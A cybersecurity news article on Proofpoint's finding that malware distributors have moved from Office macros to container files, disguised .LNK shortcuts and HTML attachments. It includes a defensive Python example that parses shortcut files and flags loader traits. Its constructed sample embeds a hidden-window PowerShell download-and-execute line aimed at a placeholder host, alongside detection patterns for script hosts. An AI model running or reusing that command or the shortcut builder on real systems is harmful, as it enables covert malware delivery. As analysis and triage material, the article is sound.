Microsoft blocked malicious macros, but hackers have found another way
Crooks are finding new ways to distribute malware following Microsoft macro crackdown
Now that macros in Office files downloaded from the internet are blocked by default, it was only a matter of time before attackers came up with a new scheme.
According to cybersecurity firm Proofpoint, attackers have found not one, not two, but three new methods to get victims to download malware.
The company's latest report says that instead of macro-laden Office files, whose use is now in significant decline, crooks are turning to container files, shortcuts, and HTML files.
Shortcuts spiking
From October 2021 until today, the number of macro-powered Office files used to distribute malware dropped by roughly two-thirds (66%). On the other hand, the use of container files (ISO, ZIP, RAR and similar) rose by approximately 175%. Container files are a convenient way to get past antivirus and email scanners, which must unpack the archive before they can inspect the payload; if the archive is also password-protected (the password is usually given in the email body), the scanner cannot open it at all, and the password adds to the attachment's perceived legitimacy.
As for shortcut files (.LNK), their use exploded in February 2022, rising by 1,675% since October 2021. Proofpoint says that ten separate threat actors now favour shortcut files to distribute malware, including the operators of heavy-hitters like Emotet, Qbot and IcedID.
The icon of a shortcut file can be changed to virtually anything, helping crooks masquerade these files as PDFs or Word documents. Windows Explorer never displays the .lnk extension, even when hiding of known extensions is turned off, so a file named invoice.pdf.lnk with an Acrobat icon appears simply as invoice.pdf.
They are also potent: a shortcut runs with the victim's own privileges and needs no exploit, so it can launch almost any command the victim is allowed to run, including PowerShell, which in this particular case the crooks use to download the malware from the internet.
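The delivery method described above leaves its traces in the shortcut file itself, and a responder who receives one of these attachments will want to see the target, the arguments and the icon without double-clicking it. The following added example (written for this page; it is not Proofpoint's or TechRadar's code) parses the Shell Link binary format from the MS-SHLLINK specification far enough to recover those fields, then applies the heuristics a triage script would use: a script host as the target, download or obfuscation switches in the arguments, an icon borrowed from a document viewer, and a minimised start window. The two .LNK blobs are constructed in the block for the demonstration (the AcroRd32.exe icon path, the example.invalid URL and the stage2.ps1 name are assumptions, not indicators from any real campaign).

```python
import re
import struct
from dataclasses import dataclass

# Constants from the MS-SHLLINK specification (Shell Link Binary File Format).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
ENV_BLOCK_SIG = 0xA0000001   # EnvironmentVariableDataBlock: target path when no IDList is stored
SW_SHOWMINNOACTIVE = 7       # ShowCommand value that starts the window minimised and inactive


@dataclass
class Shortcut:
    relative_path: str = ""
    arguments: str = ""
    icon_location: str = ""
    env_target: str = ""
    show_command: int = 1


def parse_lnk(data: bytes) -> Shortcut:
    """Walk the fixed header, skip IDList/LinkInfo, read StringData and the environment block."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    sc = Shortcut(show_command=struct.unpack_from("<i", data, 60)[0])
    off = 76
    if flags & HAS_ID_LIST:        # IDListSize (2 bytes) followed by the ItemIDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:      # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]

    def read_string() -> str:      # CountCharacters followed by the characters, no terminator
        nonlocal off
        n = struct.unpack_from("<H", data, off)[0]
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off:off + n * width]
        off += n * width
        return raw.decode("utf-16-le" if width == 2 else "cp1252")

    # StringData fields appear in this fixed order, each only when its flag is set.
    for flag, attr in ((HAS_NAME, None), (HAS_REL_PATH, "relative_path"), (HAS_WORKING_DIR, None),
                       (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        if flags & flag:
            value = read_string()
            if attr:
                setattr(sc, attr, value)
    # ExtraData: a chain of (BlockSize, BlockSignature, payload) blocks; a size < 4 terminates it.
    while off + 8 <= len(data):
        size, sig = struct.unpack_from("<II", data, off)
        if size < 4:
            break
        if sig == ENV_BLOCK_SIG and size >= 0x314:   # TargetUnicode lives at block offset 268
            sc.env_target = data[off + 268:off + 788].decode("utf-16-le").split("\x00", 1)[0]
        off += size
    return sc


SCRIPT_HOSTS = re.compile(r"^(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|msiexec|"
                          r"certutil|bitsadmin|forfiles)(\.exe)?$", re.I)
DOWNLOAD_HINTS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|start-bitstransfer|"
                            r"https?://|frombase64string|-e(nc(odedcommand)?)?\b|-w(indowstyle)?\s+hidden", re.I)
DOC_ICONS = re.compile(r"acrord32|acrobat|winword|excel|powerpnt|\.(pdf|docx?|xlsx?|ico)$", re.I)


def launched_binary(sc: Shortcut) -> str:
    target = sc.env_target or sc.relative_path
    return target.replace("/", "\\").rsplit("\\", 1)[-1]


def triage(sc: Shortcut) -> list:
    """Return the list of reasons this shortcut looks like a malware loader (empty if none)."""
    findings, exe = [], launched_binary(sc)
    icon_name = sc.icon_location.rsplit("\\", 1)[-1]
    if SCRIPT_HOSTS.match(exe):
        findings.append(f"launches a script host or LOLBin: {exe}")
    if DOWNLOAD_HINTS.search(sc.arguments):
        findings.append("arguments carry download/obfuscation markers")
    if DOC_ICONS.search(sc.icon_location) and not DOC_ICONS.search(exe):
        findings.append(f"icon borrowed from {icon_name!r} but target is {exe!r}")
    if sc.show_command == SW_SHOWMINNOACTIVE:
        findings.append("window starts minimised and inactive (hides the console)")
    return findings


def build_lnk(relative_path="", arguments="", icon_location="", env_target="", show_command=1) -> bytes:
    """Constructed sample shortcut for this example (not a real-world file)."""
    flags, strings = IS_UNICODE, []
    for flag, s in ((HAS_REL_PATH, relative_path), (HAS_ARGS, arguments), (HAS_ICON, icon_location)):
        if s:
            flags |= flag
            strings.append(s)
    header = struct.pack("<I16sIIQQQIiiHHII", 0x4C, LNK_CLSID, flags, 0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in strings)
    extra = b""
    if env_target:   # 8-byte block header + 260-byte ANSI path + 520-byte Unicode path = 0x314
        extra = (struct.pack("<II", 0x314, ENV_BLOCK_SIG) + env_target.encode("cp1252").ljust(260, b"\0")
                 + env_target.encode("utf-16-le").ljust(520, b"\0"))
    return header + body + extra + struct.pack("<I", 0)   # TerminalBlock


# Constructed inputs: a loader-style shortcut and a harmless one (assumed paths and URL).
MALICIOUS_LNK = build_lnk(
    arguments="-w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\"",
    icon_location=r"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
    env_target=r"%windir%\System32\WindowsPowerShell\v1.0\powershell.exe",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(relative_path=r"..\..\Windows\notepad.exe", icon_location=r"%SystemRoot%\System32\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("invoice.pdf.lnk", MALICIOUS_LNK), ("notes.lnk", BENIGN_LNK)):
        print(label, triage(parse_lnk(blob)) or ["no findings"])
```

Note that the loader-style sample stores its target only in the EnvironmentVariableDataBlock and leaves the IDList out, which is common in malicious shortcuts because the path expands on the victim's machine; a parser that only looks at the IDList or the relative path would report no target at all. The heuristics are deliberately simple string matches and will miss encoded or split command lines, so treat a clean result as "nothing obvious" rather than "safe".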
Proofpoint also reports a noticeable rise in the use of HTML attachments. These can also drop malware on target endpoints while evading email security systems, because the HTML assembles or fetches the payload in the recipient's browser, so the gateway sees only a web page. Still, HTML attachments remain relatively low in volume, especially compared to container files and shortcuts. Whether that changes in the future remains to be seen.
Via: BleepingComputer
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.